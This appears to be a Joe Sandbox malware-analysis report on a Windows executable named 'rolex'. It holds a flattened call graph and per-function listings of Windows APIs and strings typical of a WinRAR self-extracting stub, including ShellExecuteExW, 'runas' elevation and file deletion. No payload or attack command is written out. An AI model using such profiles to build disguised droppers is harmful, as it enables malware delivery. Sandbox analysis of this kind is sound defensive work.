26541->26580 26543 7ff7ab491fa0 31 API calls 26542->26543 26546 7ff7ab4a6ff6 26543->26546 26544->26532 26550 7ff7ab49129c 33 API calls 26544->26550 26545 7ff7ab491fa0 31 API calls 26548 7ff7ab4a6c6d 26545->26548 26549 7ff7ab491fa0 31 API calls 26546->26549 26552 7ff7ab491fa0 31 API calls 26548->26552 26549->26556 26553 7ff7ab4a6ec2 26550->26553 26551->26517 26551->26545 26552->26556 26554 7ff7ab492034 33 API calls 26553->26554 26555 7ff7ab4a6edf 26554->26555 26557 7ff7ab491fa0 31 API calls 26555->26557 26556->26486 26556->26501 26556->26509 26556->26511 26557->26556 26559 7ff7ab49c0e5 26558->26559 26560 7ff7ab49c0fa memcpy_s 26558->26560 26559->26560 26561 7ff7ab49c1a5 26559->26561 26562 7ff7ab49c12c 26559->26562 26560->26504 26581 7ff7ab491f80 33 API calls 3 library calls 26561->26581 26562->26560 26565 7ff7ab4c21d0 33 API calls 26562->26565 26564 7ff7ab49c1aa 26565->26560 26567 7ff7ab4a5849 26566->26567 26568 7ff7ab4a585b 26567->26568 26569 7ff7ab4a589e 26567->26569 26571 7ff7ab49c098 33 API calls 26568->26571 26582 7ff7ab492004 33 API calls std::_Xinvalid_argument 26569->26582 26573 7ff7ab4a5886 26571->26573 26573->26536 26574->26544 26575->26522 26576->26540 26579->26541 26581->26564 26584 7ff7ab497206 26583->26584 26585 7ff7ab49713b 26583->26585 26593 7ff7ab49704c 47 API calls memcpy_s 26584->26593 26591 7ff7ab49714b memcpy_s 26585->26591 26592 7ff7ab493f48 33 API calls 2 library calls 26585->26592 26588 7ff7ab497273 26588->25946 26589 7ff7ab49720b 26589->26588 26594 7ff7ab49889c 8 API calls memcpy_s 26589->26594 26591->25946 26592->26591 26593->26589 26594->26589 26596 7ff7ab4a2102 26595->26596 26597 7ff7ab4a20ea 26595->26597 26598 7ff7ab4a2126 26596->26598 26601 7ff7ab49b544 99 API calls 26596->26601 26597->26596 26599 7ff7ab4a20f6 FindCloseChangeNotification 26597->26599 26598->25969 26599->26596 26601->26598 26603 7ff7ab4baa2f 26602->26603 26604 7ff7ab4baa36 26602->26604 26603->26114 26604->26603 26706 7ff7ab491744 33 API calls 4 library calls 26604->26706 
26606->26114 26612 7ff7ab4bf529 memcpy_s 26607->26612 26626 7ff7ab4bf87d 26607->26626 26608 7ff7ab491fa0 31 API calls 26609 7ff7ab4bf89c 26608->26609 26610 7ff7ab4c2320 _handle_error 8 API calls 26609->26610 26611 7ff7ab4bf8a8 26610->26611 26611->26061 26613 7ff7ab4bf684 26612->26613 26713 7ff7ab4b13c4 CompareStringW 26612->26713 26615 7ff7ab49129c 33 API calls 26613->26615 26616 7ff7ab4bf6c0 26615->26616 26617 7ff7ab4a32a8 51 API calls 26616->26617 26618 7ff7ab4bf6ca 26617->26618 26619 7ff7ab491fa0 31 API calls 26618->26619 26623 7ff7ab4bf6d5 26619->26623 26620 7ff7ab4bf742 ShellExecuteExW 26621 7ff7ab4bf846 26620->26621 26622 7ff7ab4bf755 26620->26622 26621->26626 26631 7ff7ab4bf8fb 26621->26631 26624 7ff7ab4bf774 IsWindowVisible 26622->26624 26625 7ff7ab4bf78e WaitForInputIdle 26622->26625 26628 7ff7ab4bf7e3 CloseHandle 26622->26628 26623->26620 26627 7ff7ab49129c 33 API calls 26623->26627 26624->26625 26629 7ff7ab4bf781 ShowWindow 26624->26629 26707 7ff7ab4bfe24 26625->26707 26626->26608 26632 7ff7ab4bf717 26627->26632 26636 7ff7ab4bf7f2 26628->26636 26637 7ff7ab4bf801 26628->26637 26629->26625 26634 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26631->26634 26714 7ff7ab4a5b60 53 API calls 2 library calls 26632->26714 26633 7ff7ab4bf7a6 26633->26628 26641 7ff7ab4bf7b4 GetExitCodeProcess 26633->26641 26638 7ff7ab4bf900 26634->26638 26715 7ff7ab4b13c4 CompareStringW 26636->26715 26637->26621 26643 7ff7ab4bf837 ShowWindow 26637->26643 26639 7ff7ab4bf725 26642 7ff7ab491fa0 31 API calls 26639->26642 26641->26628 26644 7ff7ab4bf7c7 26641->26644 26645 7ff7ab4bf72f 26642->26645 26643->26621 26644->26628 26645->26620 26646->26114 26647->26114 26648->26114 26649->26114 26650->26114 26651->26114 26652->26050 26653->26114 26654->26114 26655->26114 26656->26114 26658 7ff7ab4a72ea 26657->26658 26716 7ff7ab49b3a8 26658->26716 26661->26087 26663 7ff7ab4a31e4 26662->26663 26664 7ff7ab4a31e7 DeleteFileW 26662->26664 26663->26664 26665 7ff7ab4a31fd 26664->26665 
26672 7ff7ab4a327c 26664->26672 26666 7ff7ab4a6a0c 49 API calls 26665->26666 26668 7ff7ab4a3222 26666->26668 26667 7ff7ab4c2320 _handle_error 8 API calls 26669 7ff7ab4a3291 26667->26669 26670 7ff7ab4a3243 26668->26670 26671 7ff7ab4a3226 DeleteFileW 26668->26671 26669->26114 26670->26672 26673 7ff7ab4a32a1 26670->26673 26671->26670 26672->26667 26674 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26673->26674 26675 7ff7ab4a32a6 26674->26675 26677->26114 26678->26114 26679->26114 26680->26114 26682 7ff7ab4a7e0c 26681->26682 26683 7ff7ab4a7e23 26682->26683 26684 7ff7ab4a7e55 26682->26684 26686 7ff7ab49129c 33 API calls 26683->26686 26720 7ff7ab49704c 47 API calls memcpy_s 26684->26720 26688 7ff7ab4a7e47 26686->26688 26687 7ff7ab4a7e5a 26688->26114 26689->26114 26690->26114 26694 7ff7ab4ad25e 26691->26694 26692 7ff7ab4ad292 26692->26112 26693 7ff7ab491744 33 API calls 26693->26694 26694->26692 26694->26693 26695->26010 26696->25997 26698->25980 26699->25983 26700->25985 26701->26039 26702->26026 26704->26028 26706->26604 26708 7ff7ab4bfe77 WaitForSingleObject 26707->26708 26709 7ff7ab4bfe2f PeekMessageW 26708->26709 26710 7ff7ab4bfe89 26708->26710 26711 7ff7ab4bfe74 26709->26711 26712 7ff7ab4bfe4b GetMessageW TranslateMessage DispatchMessageW 26709->26712 26710->26633 26711->26708 26712->26711 26713->26613 26714->26639 26715->26637 26719 7ff7ab49b3f2 memcpy_s 26716->26719 26717 7ff7ab4c2320 _handle_error 8 API calls 26718 7ff7ab49b4b6 26717->26718 26718->26114 26719->26717 26720->26687 26777 7ff7ab4a86ec 26721->26777 26723 7ff7ab49e3c4 26783 7ff7ab49e600 26723->26783 26725 7ff7ab49e4d4 26726 7ff7ab4c21d0 33 API calls 26725->26726 26729 7ff7ab49e4f0 26726->26729 26727 7ff7ab49e549 26730 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26727->26730 26728 7ff7ab49e454 26728->26725 26728->26727 26789 7ff7ab4b3148 102 API calls 26729->26789 26733 7ff7ab49e54e 26730->26733 26732 7ff7ab49e51d 26734 7ff7ab4c2320 _handle_error 8 API calls 26732->26734 
26736 7ff7ab4a18c2 26733->26736 26738 7ff7ab491fa0 31 API calls 26733->26738 26739 7ff7ab4a190d 26733->26739 26735 7ff7ab49e52d 26734->26735 26735->26130 26737 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26736->26737 26736->26739 26740 7ff7ab4a193b 26737->26740 26738->26733 26739->26130 26743 7ff7ab49e7ea 26741->26743 26742 7ff7ab49e8a1 26753 7ff7ab49e900 26742->26753 26797 7ff7ab49f578 26742->26797 26743->26742 26744 7ff7ab49e864 26743->26744 26790 7ff7ab4a3ec8 26743->26790 26744->26742 26746 7ff7ab49e993 26744->26746 26747 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26746->26747 26750 7ff7ab49e998 26747->26750 26748 7ff7ab49e955 26749 7ff7ab4c2320 _handle_error 8 API calls 26748->26749 26752 7ff7ab49e97e 26749->26752 26755 7ff7ab49e578 26752->26755 26753->26748 26833 7ff7ab4928a4 82 API calls 2 library calls 26753->26833 27787 7ff7ab4a15d8 26755->27787 26758 7ff7ab49e59e 26760 7ff7ab491fa0 31 API calls 26758->26760 26759 7ff7ab4b1870 108 API calls 26759->26758 26761 7ff7ab49e5b7 26760->26761 26762 7ff7ab491fa0 31 API calls 26761->26762 26763 7ff7ab49e5c3 26762->26763 26764 7ff7ab491fa0 31 API calls 26763->26764 26765 7ff7ab49e5cf 26764->26765 26766 7ff7ab4a878c 108 API calls 26765->26766 26767 7ff7ab49e5db 26766->26767 26768 7ff7ab491fa0 31 API calls 26767->26768 26769 7ff7ab49e5e4 26768->26769 26770 7ff7ab491fa0 31 API calls 26769->26770 26771 7ff7ab49e5ed 26770->26771 26772 7ff7ab4a18c2 26771->26772 26773 7ff7ab4a190d 26771->26773 26775 7ff7ab491fa0 31 API calls 26771->26775 26772->26773 26774 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26772->26774 26773->26134 26776 7ff7ab4a193b 26774->26776 26775->26771 26778 7ff7ab4a870a 26777->26778 26779 7ff7ab4c21d0 33 API calls 26778->26779 26780 7ff7ab4a872f 26779->26780 26781 7ff7ab4c21d0 33 API calls 26780->26781 26782 7ff7ab4a8759 26781->26782 26782->26723 26784 7ff7ab49e627 26783->26784 26786 7ff7ab49e62c memcpy_s 26783->26786 26785 7ff7ab491fa0 31 API calls 
26784->26785 26785->26786 26787 7ff7ab491fa0 31 API calls 26786->26787 26788 7ff7ab49e668 memcpy_s 26786->26788 26787->26788 26788->26728 26789->26732 26791 7ff7ab4a72cc 8 API calls 26790->26791 26792 7ff7ab4a3ee1 26791->26792 26796 7ff7ab4a3f0f 26792->26796 26834 7ff7ab4a40bc 26792->26834 26795 7ff7ab4a3efa FindClose 26795->26796 26796->26743 26798 7ff7ab49f598 _snwprintf 26797->26798 26873 7ff7ab492950 26798->26873 26801 7ff7ab49f5cc 26806 7ff7ab49f5fc 26801->26806 26888 7ff7ab4933e4 26801->26888 26804 7ff7ab49f5f8 26804->26806 26920 7ff7ab493ad8 26804->26920 27131 7ff7ab492c54 26806->27131 26813 7ff7ab498d04 33 API calls 26814 7ff7ab49f662 26813->26814 27147 7ff7ab4a7918 48 API calls 2 library calls 26814->27147 26816 7ff7ab49f677 26818 7ff7ab4a3ec8 55 API calls 26816->26818 26824 7ff7ab49f6ad 26818->26824 26821 7ff7ab49f842 26821->26806 26951 7ff7ab4969f8 26821->26951 26962 7ff7ab49f930 26821->26962 26825 7ff7ab49f89a 26824->26825 26826 7ff7ab49f74d 26824->26826 26828 7ff7ab4a3ec8 55 API calls 26824->26828 27148 7ff7ab4a7918 48 API calls 2 library calls 26824->27148 26829 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26829 26826->26825 26827 7ff7ab49f7cb 26826->26827 26830 7ff7ab49f895 26826->26830 26930 7ff7ab49f8a4 26827->26930 26828->26824 26832 7ff7ab49f8a0 26829->26832 26831 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26830->26831 26831->26825 26833->26748 26835 7ff7ab4a41d2 FindNextFileW 26834->26835 26836 7ff7ab4a40f9 FindFirstFileW 26834->26836 26838 7ff7ab4a41e1 GetLastError 26835->26838 26839 7ff7ab4a41f3 26835->26839 26836->26839 26840 7ff7ab4a411e 26836->26840 26855 7ff7ab4a41c0 26838->26855 26841 7ff7ab4a4211 26839->26841 26844 7ff7ab4920b0 33 API calls 26839->26844 26842 7ff7ab4a6a0c 49 API calls 26840->26842 26849 7ff7ab49129c 33 API calls 26841->26849 26843 7ff7ab4a4144 26842->26843 26846 7ff7ab4a4148 FindFirstFileW 26843->26846 26847 7ff7ab4a4167 26843->26847 26844->26841 26845 7ff7ab4c2320 _handle_error 8 
API calls 26848 7ff7ab4a3ef4 26845->26848 26846->26847 26847->26839 26851 7ff7ab4a41af GetLastError 26847->26851 26859 7ff7ab4a4314 26847->26859 26848->26795 26848->26796 26850 7ff7ab4a423b 26849->26850 26860 7ff7ab4a8090 26850->26860 26851->26855 26854 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26856 7ff7ab4a431a 26854->26856 26855->26845 26857 7ff7ab4a430f 26858 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26857->26858 26858->26859 26859->26854 26861 7ff7ab4a80a5 26860->26861 26864 7ff7ab4a8188 26861->26864 26863 7ff7ab4a4249 26863->26855 26863->26857 26865 7ff7ab4a8326 26864->26865 26868 7ff7ab4a81ba 26864->26868 26872 7ff7ab49704c 47 API calls memcpy_s 26865->26872 26867 7ff7ab4a832b 26870 7ff7ab4a81d4 memcpy_s 26868->26870 26871 7ff7ab4a58a4 33 API calls 2 library calls 26868->26871 26870->26863 26871->26870 26872->26867 26874 7ff7ab49296c 26873->26874 26875 7ff7ab4a86ec 33 API calls 26874->26875 26876 7ff7ab49298d 26875->26876 26877 7ff7ab492ac2 26876->26877 26878 7ff7ab4c21d0 33 API calls 26876->26878 27156 7ff7ab4a4d04 26877->27156 26879 7ff7ab492ab0 26878->26879 26879->26877 27149 7ff7ab4991c8 26879->27149 26883 7ff7ab4a2ca8 27188 7ff7ab4a24c0 26883->27188 26885 7ff7ab4a2cc5 26885->26801 27207 7ff7ab4a28d0 26888->27207 26889 7ff7ab493431 memcpy_s 26897 7ff7ab49344e 26889->26897 26899 7ff7ab493601 26889->26899 27212 7ff7ab4a2bb0 26889->27212 26890 7ff7ab493674 27226 7ff7ab4928a4 82 API calls 2 library calls 26890->27226 26892 7ff7ab4969f8 132 API calls 26894 7ff7ab493682 26892->26894 26894->26892 26895 7ff7ab49370c 26894->26895 26894->26899 26916 7ff7ab4a2aa0 101 API calls 26894->26916 26895->26899 26901 7ff7ab493740 26895->26901 27227 7ff7ab4928a4 82 API calls 2 library calls 26895->27227 26897->26890 26897->26894 26898 7ff7ab4935cb 26898->26897 26900 7ff7ab4935d7 26898->26900 26899->26804 26900->26899 26903 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26900->26903 26901->26899 26902 7ff7ab49384d 
26901->26902 26914 7ff7ab4a2bb0 101 API calls 26901->26914 26902->26899 26905 7ff7ab4920b0 33 API calls 26902->26905 26906 7ff7ab493891 26903->26906 26904 7ff7ab4934eb 26904->26898 27221 7ff7ab4a2aa0 26904->27221 26905->26899 26906->26804 26908 7ff7ab4969f8 132 API calls 26909 7ff7ab49378e 26908->26909 26909->26908 26910 7ff7ab493803 26909->26910 26917 7ff7ab4a2aa0 101 API calls 26909->26917 26912 7ff7ab4a2aa0 101 API calls 26910->26912 26912->26902 26913 7ff7ab4a28d0 104 API calls 26913->26904 26914->26909 26915 7ff7ab4a28d0 104 API calls 26915->26898 26916->26894 26917->26909 26921 7ff7ab493af9 26920->26921 26922 7ff7ab493b55 26920->26922 27239 7ff7ab493378 26921->27239 26924 7ff7ab4c2320 _handle_error 8 API calls 26922->26924 26926 7ff7ab493b67 26924->26926 26926->26813 26926->26827 26927 7ff7ab493b6c 26928 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26927->26928 26929 7ff7ab493b71 26928->26929 27420 7ff7ab4a886c 26930->27420 26932 7ff7ab49f8ba 27424 7ff7ab4aef60 GetSystemTime SystemTimeToFileTime 26932->27424 26935 7ff7ab4b0994 26936 7ff7ab4c0340 26935->26936 26937 7ff7ab4a7df4 47 API calls 26936->26937 26938 7ff7ab4c0373 26937->26938 26939 7ff7ab4aaae0 48 API calls 26938->26939 26940 7ff7ab4c0387 26939->26940 26941 7ff7ab4ada98 48 API calls 26940->26941 26942 7ff7ab4c0397 26941->26942 26943 7ff7ab491fa0 31 API calls 26942->26943 26944 7ff7ab4c03a2 26943->26944 27433 7ff7ab4bfc68 26944->27433 26952 7ff7ab496a0a 26951->26952 26953 7ff7ab496a0e 26951->26953 26952->26821 26961 7ff7ab4a2bb0 101 API calls 26953->26961 26954 7ff7ab496a1b 26955 7ff7ab496a2f 26954->26955 26956 7ff7ab496a3e 26954->26956 26955->26952 27445 7ff7ab495e24 26955->27445 27520 7ff7ab495130 130 API calls 2 library calls 26956->27520 26958 7ff7ab496a3c 26958->26952 27521 7ff7ab49466c 82 API calls 26958->27521 26961->26954 26963 7ff7ab49f978 26962->26963 26967 7ff7ab49f9b0 26963->26967 27020 7ff7ab49fa34 26963->27020 27659 7ff7ab4b612c 137 API calls 3 library calls 26963->27659 
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
                                                                                • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                • API String ID: 2128803032-2702805183
                                                                                • Opcode ID: 44c66d4143957b758382f86cfa4081ed6d928b54fc22ddb9a7340f649bf70bb4
                                                                                • Instruction ID: fdba8a4c4d8875d52f6723824b07296e9edc83b634d9e8cbeb952fc021723e7b
                                                                                • Opcode Fuzzy Hash: 44c66d4143957b758382f86cfa4081ed6d928b54fc22ddb9a7340f649bf70bb4
                                                                                • Instruction Fuzzy Hash: 96D28662A0F78291EA20BB7DE8546F9A361EF85B80FC24135DA4D076B6DF3DE544C720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
                                                                                • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                • API String ID: 2285161090-3916287355
                                                                                • Opcode ID: e530fa976c247d03843a71bdcb8ea7d5b705ef19b124f0053bbcc44abdb5d3bc
                                                                                • Instruction ID: efc2e8aa5903ceb3c1aaf1cea86fe8ca93c4f906e7a6f784797df8be23423385
                                                                                • Opcode Fuzzy Hash: e530fa976c247d03843a71bdcb8ea7d5b705ef19b124f0053bbcc44abdb5d3bc
                                                                                • Instruction Fuzzy Hash: 3813A022B06B8295EB10EFB8D8402EC67B1EB44798F820535DB5D17AF9DF38E595C360

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                • API String ID: 1048086575-3710569615
                                                                                • Opcode ID: d5ff2d27d4a47c3e78c3dd13211a1c1de422b0d8b6c9155afaadc84a8e0932e8
                                                                                • Instruction ID: 3fa513fb462e2a6c13f4476274422283d914929ecece555d79def0e54cc43c90
                                                                                • Opcode Fuzzy Hash: d5ff2d27d4a47c3e78c3dd13211a1c1de422b0d8b6c9155afaadc84a8e0932e8
                                                                                • Instruction Fuzzy Hash: 0C126661A1AB8281EB10EB6CE8452B9E761FF85B44FC14235DA9D47BB6DF3CE140C720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                • String ID: $%s:$CAPTION
                                                                                • API String ID: 1936833115-404845831
                                                                                • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction ID: f18281db7b6824ea551893460ccf7ea356310c40c34f707a9ccc4524bf5c8d45
                                                                                • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction Fuzzy Hash: 4A91D832B1964186E714EF3DA440669E7A1FB88B84F855535EE4D47BB8DF3CE805CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: __tmp_reference_source_
                                                                                • API String ID: 3668304517-685763994
                                                                                • Opcode ID: 4624d0d2893f011b5be8b6ffca3faaddc15c8b957ce7a47abe3dcbca9120cf77
                                                                                • Instruction ID: 15b592bc9c0ecec2f8723c894d324e089032fb4cdd8fe0a4eea219f695fb652b
                                                                                • Opcode Fuzzy Hash: 4624d0d2893f011b5be8b6ffca3faaddc15c8b957ce7a47abe3dcbca9120cf77
                                                                                • Instruction Fuzzy Hash: 8EE2A262A0A6C296EA64EB39E4507BEE761FB81780F814136DB9D137B5CF3CE454C720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: CMT
                                                                                • API String ID: 3668304517-2756464174
                                                                                • Opcode ID: 3e3ef2645bc48f2f268b551dc6196b380c912f1c7b9d048ccb2ab2083d35e596
                                                                                • Instruction ID: 2cb3ba7b84680c70c42c0fb4f4d6b0c5c674403a2d46afbb1cb2bc7c758a83fb
                                                                                • Opcode Fuzzy Hash: 3e3ef2645bc48f2f268b551dc6196b380c912f1c7b9d048ccb2ab2083d35e596
                                                                                • Instruction Fuzzy Hash: 18E2F032B0A68286EB28EB79D4506FDA7A1FB45784F910035EA5E477B6DF3CE454C320

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                • String ID:
                                                                                • API String ID: 474548282-0
                                                                                • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                • Instruction ID: f9e9ebafca51cdc6c7961245dec2d50d0ad6b386c36ac6b166f8d35b6bf43502
                                                                                • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                                                                                • Instruction Fuzzy Hash: B461D572A0A64281EA10AF2DE84527DA761FB85BB4F914335EABD036F9DF3CD544C710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
